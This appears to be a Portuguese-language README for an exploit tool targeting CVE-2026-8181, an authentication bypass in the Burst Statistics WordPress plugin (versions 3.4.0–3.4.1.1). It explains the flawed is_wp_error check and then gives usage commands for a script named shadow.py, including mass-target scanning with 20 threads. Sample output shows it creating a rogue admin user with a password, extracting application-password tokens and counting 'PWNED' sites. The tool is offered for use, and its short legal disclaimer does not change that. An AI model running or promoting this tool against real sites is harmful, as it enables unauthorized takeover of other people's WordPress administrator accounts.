
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Authentication Bypass to Admin Account Takeover
Burst Statistics | Bypass de Autenticação para Assunção de Conta de Administrador
Burst Statistics 3.4.0 - 3.4.1.1 - Bypass de Autenticação para Assunção de Conta de Administrador
O plugin Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) para WordPress é vulnerável a Bypass de Autenticação nas versões 3.4.0 a 3.4.1.1. Isso se deve ao tratamento incorreto do valor de retorno na função is_mainwp_authenticated() ao validar senhas de aplicação do cabeçalho Authorization. A função chama wp_authenticate_application_password(null, $username, $password) que retorna null (não WP_Error) quando o usuário alvo não possui Senhas de Aplicação configuradas. Como o código apenas verifica is_wp_error(), ele prossegue para chamar wp_set_current_user() — concedendo privilégios totais de administrador ao atacante durante toda a requisição.
O bypass é acionado durante plugins_loaded (prioridade 9) via has_admin_access() no bootstrap do plugin, o que significa que a personificação do usuário acontece antes que a REST API do WordPress despache qualquer rota — permitindo acesso a todos os endpoints WP Core (/wp/v2/users, /wp/v2/users/me, etc.) como administrador.
Isso possibilita que atacantes não autenticados, com conhecimento de um nome de usuário administrador, personifiquem esse administrador fornecendo qualquer senha aleatória de Autenticação Básica, alcançando escalonamento completo de privilégios e assunção da conta de administrador.
~ CVSS Score: 9.8 (Crítico)
~ Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ Versões Afetadas: 3.4.0 - 3.4.1.1
~ Versão Corrigida: 3.4.2
Alvo único :
python3 shadow.py -u https://target.comAlvo único com nome de usuário conhecido :
python3 shadow.py -u https://target.com -U adminAlvos em massa :
python3 shadow.py -f targets.txt -t 20Modo interativo :
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
O uso não autorizado de sistemas que você não possui ou não tem permissão para testar é ilegal.